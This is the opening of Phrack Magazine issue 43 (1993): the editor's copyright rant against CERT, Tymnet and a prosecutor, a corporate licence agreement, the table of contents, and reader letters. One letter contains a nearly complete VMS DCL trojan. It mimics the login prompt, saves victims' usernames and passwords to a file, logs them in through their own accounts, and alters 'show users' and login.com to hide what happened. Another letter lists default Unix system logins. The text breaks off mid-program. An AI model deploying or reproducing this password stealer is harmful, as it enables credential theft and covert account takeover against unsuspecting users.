==Phrack Magazine==

Volume Four, Issue Forty-Three, File 1 of 27

Issue 43 Index
___________________

P H R A C K   4 3

July 1, 1993
___________________

~ finger whitehouse.gov and make a secret service agent come ~

Well, here it is: Phrack 43. This issue should really piss every security professional off. Well, actually, none of them should ever see it because only two people have registered their subscriptions.

But, then again I think we all know that the whole world is FULL of lying, thieving people who just don't care about other people's property. No, smarty, not hackers...computer professionals!

CASE 1: The Computer Emergency Response Team.

Bastions of life, liberty and the pursuit of happiness. CERT had been on the Phrack mailing list previously, and was sent a copy of 42 (as was everyone) to give them the opportunity to subscribe. Rather than do the right thing and let us at Phrack know that they were not interested in paying, and to take their name off the list, Ed DiHart instead forwarded off several copies to his cronies.

Luckily for us, Ed is not the best typist, and the mail bounced all the way back to Phrack. I called Ed and asked him why he would do such a thing, which was clearly a direct violation of US Copyright Law. Ed claimed he didn't know of any new rules for Phrack, and that he had always forwarded off a few copies to his pals. I told Ed that this practice was unacceptable and that if he wanted to continue to get Phrack he and his pals would all have to register their subscriptions. Ed said that he did not want to pay and to take CERT off the list.

A month prior to this Ed had said to me at the Computers, Freedom & Privacy conference in San Francisco, "Why are YOU here anyway? It sure is IRONIC that someone whose goal in life was to invade other people's privacy would be attending a conference on protecting privacy." I walked away from him in disgust.
While talking to Ed about Phrack I said, "You know Ed, it sure is IRONIC that an organization such as CERT, whose main goal is to help protect the property of others would so flagrantly violate US Copyright law and completely disregard someone's property rights." Man, did that feel great!

CASE 2: BT Tymnet.

Dale Drew, security guru, made the statement on IRC about Phrack, "I have absolutely no desire to pay for anything having to do with hackers." Later, someone from Dale's machine at BT Tymnet (opus.tymnet.com) logged into Len Rose's machine and ftp'd Phrack 42. With prior knowledge Phrack was not free, he willingly used company property to commit a crime. At most companies, that is grounds for termination. Luckily for Dale Tymnet doesn't give a shit. In fact, Dale several times since has gone back on IRC stating, "People here are Tymnet are kind of upset about Phrack 42." This just shows that people at Tymnet are just as criminal as they say hackers are. Since they could care less about MY property, then why should I care about theirs? Maybe I should print a list of all Tymnet internal NUIs! Well, two wrongs won't make a right, so I better not.

I did, however, send email to Dale stating that we were aware of Tymnet's transgressions and that we may be forced to take legal action. I have decided to offer BT a sweet deal on a company-wide site license. We shall see if they take me up on this offer, or continue to steal Phrack.

CASE 3: Gail Thackeray.

A woman sworn by the court to uphold the laws of the land. This woman had the audacity to tell me that unless I enforced my copyright, it was worthless. Unless I enforce it. What the hell does that mean? Am I supposed to raid companies myself and go dig for evidence that they have stolen my information? Geez...it's not like I'm Bellcore.
Gail's disgusting interpretation of the law, that unless you are big enough to stand up for yourself then you have no recourse, is a festering sore on the face of the American Legal system and I personally am appalled that this woman is allowed to act as a law enforcement professional.

Oh well, as you can tell I've had a little fun with all this. And I have effectively proven my point. Security people, corporate professionals, and law enforcement types are just as unscrupulous and unethical as they have always claimed that we are.

Only TWO PEOPLE within the computer/legal/security profession have the right to receive and keep copies of Phrack. Winn Schwartau, and a man at Mitre. It's amazing that they are the only ones with any scruples, isn't it?

Well, let's get on with the issue. This one is pure, unadulterated evil. Only the strong will survive this time. We've got Cellular, we've got Novell, we've got 5e, we've got PHRACK TRIVIA! Get comfortable, grab your favorite intoxicant, and enjoy.

*NOTES*

Some of you will recognize the 5ESS file from the Summer issue of 2600 magazine. This file was sent to both myself and E. Goldstein. I was told by the author that 2600 was not printing it. Wrong. Well, we got permission from 2600 to print it here too since it's such a good file, and since I spent like 8 hours dealing with the author correcting and editing it.

In the future gang, if you send something to Phrack AND to 2600, TELL US BEFOREHAND! The last thing I want to hear is, "Phrack is plagiarizing 2600...gawd they are so lame."

The acronym file, you will note, is DIFFERENT. Heh.

In addition to the above, you may notice that we were a bit late in distributing this issue. As many of you saw through the "resubscribe" blurb sent over the mailing list, Phrack is not going through Stormking.COM any longer. The struggle to relocate put us into further delays but I've managed to take care of securing a new distribution site.
We want to thank everyone at Stormking for shipping Phrack out for so long, and wish them the best in their future endeavors.

-------------------------------------------------------------------------

READ THE FOLLOWING

IMPORTANT REGISTRATION INFORMATION

Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you.

You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file.

Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership.

_______________________________________________________________

Phrack Magazine corporate/institutional/government agreement

Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine.

This magazine may not be distributed by Company to any outside corporation, organization or government agency.
This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws.

This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document.

In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement.

In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company.

This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed.

This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement.

The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company.

_________________________________________________________________

REGISTRATION INFORMATION REQUEST FORM

We have approximately __________ users.

We desire Phrack Magazine distributed by (Choose one):

Electronic Mail: _________
Hard Copy:       _________
Diskette:        _________  (Include size & computer format)

Name:_______________________________  Dept:____________________

Company:_______________________________________________________

Address:_______________________________________________________

_______________________________________________________________

City/State/Province:___________________________________________

Country/Postal Code:___________________________________________

Telephone:____________________   Fax:__________________________

Send to:

Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701

-----------------------------------------------------------------------------

Enjoy the magazine. It is for and by the hacking community. Period.

Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
3L33t : OMAR
News : Datastream Cowboy
Photography : dFx
Pornography : Stagliano
Prison Consultant : Co / Dec
The Baddest : Dolomite
Rad Book : Snow Crash
Reasons Why I Am The Way I Am : Hoffman, Hammett, The Power Computer
Typist : Minor Threat
Future Movie Star : Weevil
SCon Acid Casualty : Weevil
Thanks To : Robert Clark, Co/Dec, Spy Ace, Lex Luthor
            Phreak Accident, Madjus, Frosty, Synapse, Hawkwind
            Firm G.R.A.S.P., Aleph One, Len Rose, Seven-Up
            Computer Crime Laboratories

"If you can take the bag off of your own head, then you haven't had enough nitrous." -- KevinTX

Phrack Magazine V. 4, #43, July 1, 1993. ISSN 1068-1035
Contents Copyright (C) 1993 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list.

Phrack Magazine
603 W. 13th #1A-278                 (Phrack Mailing Address)
Austin, TX 78701

ftp.netsys.com                      (Phrack FTP Site)
/pub/phrack

phrack@well.sf.ca.us                (Phrack E-mail Address)

Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it.
:) )

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----

-= Phrack 43 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
 1. Introduction by The Editor                            24K
 2. Phrack Loopback Part I                                38K
 3. Phrack Loopback Part II / Editorial                   44K
 4. Line Noise Part I                                     39K
 5. Line Noise Part II                                    43K
 6. Phrack Pro-Phile on Doctor Who                        15K
 7. Conference News Part I by Various Sources             53K
 8. Conference News Part II by Various Sources            58K
 9. How To Hack Blackjack (Part I) by Lex Luthor          52K
10. How To Hack Blackjack (Part II) by Lex Luthor         50K
11. Help for Verifying Novell Security by Phrack Staff    48K
12. My Bust (Part I) by Robert Clark                      56K
13. My Bust (Part II) by Robert Clark                     55K
14. Playing Hide and Seek, Unix Style by Phrack Accident  31K
15. Physical Access and Theft of PBX Systems by Co/Dec    28K
16. Guide to the 5ESS by Firm G.R.A.S.P.                  63K
17. Cellular Info by Madjus (N.O.D.)                      47K
18. LODCOM BBS Archive Information                        24K
19. LODCOM Sample Messages                                52K
20. Step By Step Guide To Stealing a Camaro by Spy Ace    21K
21. Acronyms Part I by Firm G.R.A.S.P.                    50K
22. Acronyms Part II by Firm G.R.A.S.P.                   51K
23. Acronyms Part III by Firm G.R.A.S.P.                  45K
24. Acronyms Part IV by Firm G.R.A.S.P.                   52K
25. Acronyms Part V by Firm G.R.A.S.P.                    46K
26. International Scene by Various Sources                51K
27. Phrack World News by Datastream Cowboy                24K

Total: 1152K

Another reason why the future is wireless.

"The CTIA recommended that the FCC require the microprocessor chip be difficult to detach from the circuit board in order to prevent its removal and replacement or reprogramming."
(Cellular Marketing, p. 18, May 1993)

"Damn, and I was hoping to replace this 8051 with a P5! HAHAHAHAHA!"
(Anonymous hacker-type, Tumbled Cellphone Call, 1993)
_______________________________________________________________________________

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 2 of 27

Phrack Loopback
Part I

****************************************************************************

COMING NEXT ISSUE

Van Eck Info (Theory & Practice)
More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!)
Neato Plans For Evil Devices
Gail Thackeray Gifs

*********************************** M A I L *********************************

Chris,

Craig Neidorf gave me these addresses as ways to reach you. He tells me that you are currently editing Phrack. I hope you are well.

Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our IUP connection, was charging us an extra $1,000 per month. They did some investigation at my request. We determined that Phrack traffic alone was responsible for over 40% of the total bytes transferred from the site over the past year or so. This is several gigabytes per month. All in all, the CuD archive, which contains Phrack, CuD, and other publications accounts for 85% of our total traffic. All of the email to and from EFF, Usenet traffic, and other FTP (from the EFF archive, the CAF archive, and others) constitutes about 15%.

EFF isn't going to be able to carry it any more because it is effectively costing us $1,000 per month. The fundamental problem is that Phrack is so popular (at least as a free good) to cause real expense in transmission costs. Ultimately the users are going to have to pay the costs because bandwidth (when measured in gigabytes anyway) isn't free. The 12K per year it costs us to carry Phrack is not something which EFF can justify in its budget. I'm sure you can understand this.

On July 1, eff.org moves from Cambridge to Washington, DC which is when I expect we will stop carrying it. I wanted to raise this issue now to let you know in advance of this happening.

I have also asked Chris and Helen to talk to Brendan Kehoe, who actually maintains the archive, to see whether there is anything we can do to help find another site for Phrack or make any other arrangement which will result in less loss of service.

Mitch
------------------------------------------------------------------------------
Mitchell Kapor, Electronic Frontier Foundation
Note permanent new email address for all correspondence as of 6/1/93
mkapor@kei.com

[Editor: Well, all things must come to an end. Looks like EFF's move to Washington is leaving behind lots of bad memories, and looking forward to a happy life in the hotbed of American politics. We wish them good luck. We also encourage everyone to join.........CPSR.

In all fairness, I did ask Mitch more detail about the specifics of the cost, and he explained that EFF was paying flat rate for a fractional T-1, and whenever they went over their allotted bandwidth, they were billed above and beyond the flat rate. Oh well.

Thank GOD for Len Rose. Phrack now has a new home at ftp.netsys.com.]

****************************************************************************

I'm having a really hard time finding a lead to the Information America Network. I am writing you guys as a last resort. Could you point me in the right direction? Maybe an access number or something? Thank you very much.

[Editor: You can reach Information America voice at 404-892-1800. They will be more than happy to send you loads of info.]

****************************************************************************

To whom it may concern:

This is a submission to the next issue of phrack...thanks for the great 'zine!

----------------------------cut here-------------------------------

Greetings Furds:

Have you ever wanted to impress one of those BBS-babes with your astounding knowledge of board tricks? Well *NOW* you can! Be the life of the party! Gain and influence friends! Irritate SysOps! Attain the worship and admiration of your online pals.

Searchlight BBS systems (like many other software packages) have internal strings to display user information in messages/posts and the like. They are as follows (tested on Searchlight BBS System v2.25D):

\%A = displays user's access level
\%B = displays baud rate connected at
\%C = unknown
\%F = unknown
\%G = displays graphics status
\%K = displays user's first name
\%L = displays system time
\%M = displays user's time left on system
\%N = displays user's name in format: First Last
\%O = times left to call "today"
\%P = unknown
\%S = displays line/node number and BBS name
\%T = displays user's time limit
\%U = displays user's name in format: FIRST_LAST

All you gotta do is slam the string somewhere in the middle of a post or something and the value will be inserted for the reader to see.

Example:

Hey there chump, I mean \%K, you better you better UL or log off of \%S...you leach too damn many files..you got \%M mins left to upload some new porn GIFs or face bodily harm and mutilation!.

----------------------------

Have phun!

Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS

[Editor: Ya know, once a LONG LONG time ago, I got on a BBS and while reading messages noticed that a large amount of messages seemed to be directed at ME!!# It took me about 10 minutes to figure it out, but BOY WAS I MAD! Then I added my own \%U message for the next hapless fool. :) BIG FUN!]

****************************************************************************

-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-

SotMESC

The US SotMESC Chapter is offering Scholarships for the 1993 school term.
Entries should be single-spaced paragraphs, Double-spacing between paragraphs. The subject should center on an aspect of the Computer Culture and be between 20-30 pages long.

Send entries to:

SotMESC
PO Box 573
Long Beach, MS 39560

All entries submitted will become the property of the SotMESC

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

****************************************************************************

The Southwest Netrunner's League's
-----------------------------------------------------------------
WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------

Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
Assists by:SysCon XIV (The Ma'Bell Rapist)
           Iron Man MK 4a (Things that make ya go boom)

This file begs to be folded, spindeled,and mutilated.
No Rights Reserved@1993
-----------------------------------------------------------------
Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu

Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------

Part I(Basic commands)

Phile Commands:
  ls=List Philes
  more,page=Display Phile on Yo Terminal
  cp=Copy Phile
  mv=Move or Remove Philes
  rm=Remove Philes

Editor Commnds:
  vi=Screen Editor

Dirtory cmmnds:
  dir=Prints Directory
  mkdir=Makes a new Directory(also a VERY bad bug)
  rmdir=Remove a Directory
  pwd=print working directory

Misc. Commands:
  apropos=Locate commands by keyword lookup.
  whatis=Display command description.
  man=Displays manual pages online.
  cal=Prints calendar
  date=Prints the time and date.
  who=Prints out every one who is logged in (Well, almost everyone 7:^] )

---------------------------------------------------------------

Part II(Security(UNIX security, another OXYMORON 7:^] ))

If you are a useless wAReZ r0dEnT who wants to try to Netrun a UNIX system, try these logins....

root
unmountsys
setup
makefsys
sysadm
powerdown
mountfsys
checkfsys

All I can help ya with on da passwords iz ta give you some simple guidelines on how they are put together....

6-8 characters
6-8 characters
1 character is a special character (exmpl:# ! ' & *)

-----------------------------------------------------------------

Well thats all fo' now tune in next time, same Hack-time same Hack-channel!!!

THE TECHNOMANCER                    I have taken all knowledge
af604@FreeNet.hsc.colorado.edu      to be my province
                                    -- Technomancer
                                    Southwest Netrunner's League

*****************************************************************

[Editor: This is an example of what NOT to send to Phrack. This is probably the worst piece of garbage I've received, so I had to print it. I can only hope that it's a private joke that I just don't get.

Uh, please don't try to write something worse and submit it hoping to have it singled out as the next "worst," since I'll just ignore it.]

****************************************************************************

Dear Phrack,

I was looking through Phrack 42 and noticed the letters about password stealers. It just so happened that the same day I had gotten extremely busted for a program which was infinitely more indetectible. Such is life. I got off pretty well being an innocent looking female so it's no biggie. Anyway, I deleted the program the same day because all I could think was "Shit, I'm fucked". I rewrote a new and improved version, and decided to submit it. The basic advantages of this decoy are that a) there is no login failure before the user enters his or her account, and b) the program defines the show users command for the user so that when they do show users, the fact that they are running out of another account doesn't register on their screen.

There are a couple holes in this program that you should probably be aware of.
Neither of these can kick the user back into the account that the program is running from, so that's no problem, but the program can still be detected. (So basically, don't run it out of your own account... except for maybe once...to get a new account to run it out of) First, once the user has logged into their account (out of your program of course) hitting control_y twice in a row will cause the terminal to inquire if they are doing this to terminate the session on the remote node. Oops. It's really no problem though, because most users wouldn't even know what this meant. The other problem is that, if the user for some strange reason redefines show: $show == "" then the show users screen will no longer eliminate the fact that the account is set host out of another. That's not a big deal either, however, because not many people would sit around randomly deciding to redefine show. The reason I was caught was that I (not even knowing the word "hacker" until about a month ago) was dumb enough to let all my friends know about the program and how it worked. The word got spread to redefine show, and that's what happened. The decoy was caught and traced to me. Enough BS...here's the program. Sorry...no UNIX...just VMS. Lady Shade I wrote the code...but I got so many ideas from my buddies: Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice ------------------------------------------------ $if p1 .eqs. "SHOW" then goto show $sfile = "" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! The role of the dummy file in this program is to tell if the program !!!! !!!! is being used as a decoy or as a substitute login for the victim. It !!!! !!!! does not stay in your directory after program termination. !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $sfile = f$search("sys$system:[ZJABAD_X]dummy.txt") $if sfile .nes. 
"" then goto other $open/write io user.dat $close io $open/write dummy instaar_device:[miller_g]dummy.txt $close dummy $wo == "write sys$output" $line = "" $user = "" $pass = "" $a$ = "" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! A login screen with a message informing someone of new mail wouldnt !!!! !!!! be too cool... !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $set broadcast=nomail $set message/noidenficitaion/noseverity/nofacility/notext $on error then goto outer $!on control_y then goto inner $wo " [H [2J" $wo "" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! insert a fake logout screen here !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $wo " ZJABAD_X logged out at ", f$time() $wo " [2A" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! This is the main body of the program. It simulates the system login !!!! !!!! screen. It also grabs the username and password and sticks them in !!!! !!!! a file called user.dat !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $outer: $set term/noecho $inquire a$/nopun "" $inquire a$/nopun "" $set term/echo $c = 0 $c1 = 0 $c2 = 0 $inner: $c2 = c2 + 1 $if c2 .eqs. 5 then goto speedup $c = c + 1 $if c .eqs. 15 then goto fail $if c1 .eqs. 3 then goto fail3 $user = "a" $wo "Username: " $from_speedup: $set term/uppercase $wo " [2A" $read/time_out=10/prompt=" [9C " sys$command user $if user .eqs. "a" then goto timeout $set term/nouppercase $if user .eqs. "" then goto inner $set term/noecho $inquire pass "Password" $set term/echo $if user .eqs. "ME" then goto done $if pass .eqs. "" then goto fail $open/append io user.dat $write io user + " " + pass $close io !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! Sends the user into their account !!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what !!!!
!!!! the system login screen does. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to !!!!
!!!! uppercase for the input of a username. This is wonderful for !!!!
!!!! preventing program detection, but it does cause a problem. It slows !!!!
!!!! the screen down, which looks suspicious. So, in the case where a !!!!
!!!! user walks up to the terminal and holds the return key down for a !!!!
!!!! bit before typing in their username, this section speeds up the run !!!!
!!!! considerably. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is !!!!
!!!! implemented, you should at least put in something that looks like !!!!
!!!! you have just logged in, the program should not kick straight back !!!!
!!!! to your command level, but rather execute your login.com. 2) You !!!!
!!!! can log in to the account which is stealing the password from a !!!!
!!!! different terminal and stop the process on the account which is !!!!
!!!! running the program. This is much safer, and my recommendation. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show !!!!
!!!! users screen which registers this is at the far right hand side. !!!!
!!!! This section first writes the show users data to a file and alters !!!!
!!!! it before it is written to the screen for viewing by the user. There !!!!
!!!! may exist many forms of the show users command in your system, and !!!!
!!!! you may have to handle each one differently. I have written only two !!!!
!!!! manipulations into this code to be used as an example. But looking !!!!
!!!! at how this is performed should be enough to allow you to write your !!!!
!!!! own special cases. Notice that what happens to activate this section !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables !!!!
!!!! passed into the program as p1, p2, etc. in the order which they !!!!
!!!! were typed after the word show. Also, by incorporating a third data !!!!
!!!! file into the manipulations, one can extract the terminal id for the !!!!
!!!! account which the program is running out of and plug this into the !!!!
!!!! place where the user's line displays his or her terminal id. Doing !!!!
!!!! this is better than putting in a fake terminal id, but that is just a !!!!
!!!! minor detail. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show$'
$manipulate:
$set message/nofacility/noseverity/notext/noidentification
$open/read io1 users.dat
$open/write io2 users2.dat
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control_y must be dealt with here. If the user did happen to controlY !!!
!!!! there is a chance that the files users.dat and users2.dat could be !!!
!!!! left in their directory. That is a bad thing as we are trying to !!!
!!!! prevent detection :) !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$on control_y then goto aborted
$user = ""
$test = ""
$long = ""
$ch = ""
$length = 0
$user = f$user()
$length = f$length(user) - 2
$user = f$extract(1,length,user)
$read_loop:
$read/end_of_file=eof io1 line
$test = f$extract(1,length,line)
$ch = f$extract (length+1,1,line)
$if (test .eqs. user) .and. (ch .eqs. " ") then goto change
$from_change:
$write io2 line
$goto read_loop
$eof:
$close io1
$close io2
$type users2.dat
$del users.dat;*
$del users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
$change:
$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
$goto from_change
$aborted:
$!if f$search("users.dat") .nes. "" then close io1
$!if f$search("users.dat") .nes. "" then delete users.dat;*
$!if f$search("users2.dat") .nes. "" then close io2
$!if f$search("users2.dat") .nes. "" then delete users2.dat;*
$close io1
$close io2
$delete users.dat;*
$delete users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the section of the program which is executed in place of the !!!!
!!!! users login.com. It does grab their login and execute it to prevent !!!!
!!!! suspicion, but there are a couple of hidden commands which are also !!!!
!!!! added. They redefine the show and sys commands so that the user can !!!!
!!!! not detect that he or she is riding off of another account. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$other:
$sh$ = "@instaar_device:[miller_g]findnext show"
$shline = "$sh*ow ==" + sh$
$logi = ""
$logi = f$search("login.com")
$if logi .NES. "" then goto Ylogin
$nologin:
$open/write io login2.com
$write io shline
$close io
$@login2
$delete login2.com;*
$exit
$ylogin:
$open/write io2 login2.com
$open/read io1 login.com
$transfer_loop:
$read/end_of_file=ready io1 line
$write io2 line
$goto transfer_loop
$ready:
$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
$close io1
